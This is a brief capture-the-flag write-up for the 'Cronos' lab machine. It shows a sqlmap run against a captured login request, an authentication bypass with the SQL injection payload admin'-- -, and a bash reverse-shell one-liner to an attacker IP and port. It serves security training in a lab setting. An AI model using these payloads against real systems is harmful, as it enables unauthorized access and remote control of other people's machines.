Exploitation

Since the page does appear to be on the older side I have attemped default password credentials, such as admin admin, admin password, root password to no avail. The next step is an SQL injection.

Using SQLmap:

sqlmap -r login.req

login.req file includes:

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://admin.cronos.htb
Connection: close
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=q2gtnrhsagsgd5oiod4ckp0si4
Upgrade-Insecure-Requests: 1

username=admin&password=admin

It appears that the username is injectable.

Changing the username parameter to

username=admin'-- - 

bypasses the login functionality. This is because the sql statement:

SELECT * from TABLE WHERE username='admin'-- -' AND password='password'

As you can see when we add the '-- - to the username field we are commenting out the AND password='password' statement.

successful login

Testing the application, we can see that we can execute code.

Getting a Reverse Shell

bash -c 'bash -i >& /dev/tcp/10.10.14.28/1234 0>&1'